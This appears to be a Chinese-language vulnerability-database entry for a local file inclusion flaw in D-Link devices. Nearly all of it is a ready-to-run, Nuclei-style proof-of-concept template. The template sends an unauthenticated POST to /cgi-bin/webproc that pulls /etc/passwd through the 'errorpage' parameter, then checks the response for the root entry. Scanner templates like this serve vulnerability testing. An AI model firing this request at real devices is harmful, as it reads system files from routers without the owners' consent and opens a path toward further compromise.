dlink-file-read: D-Link - Local File Inclusion

日期: 2025-08-01 | 影响软件: D-Link | POC: 已公开

漏洞描述

D-Link is vulnerable to local file inclusion.

PoC代码[已公开]

id: dlink-file-read

info:
  name: D-Link - Local File Inclusion
  author: dhiyaneshDK
  severity: high
  description: D-Link is vulnerable to local file inclusion.
  reference:
    - https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: dlink,lfi,misconfig,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/webproc"

    body: 'errorpage=/etc/passwd&obj-action=auth&:action=login'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: status
        status:
          - 200
# digest: 490a0046304402206b329248b2ed269977b9b9fc642df455370ec02891691a14ae2232440edddfed0220127f25defbd2f3aba8253e4134901598eeb4910e00f72bc6f3a9743d5653cb91:922c64590222798bb761d5b6d8e72950

相关漏洞推荐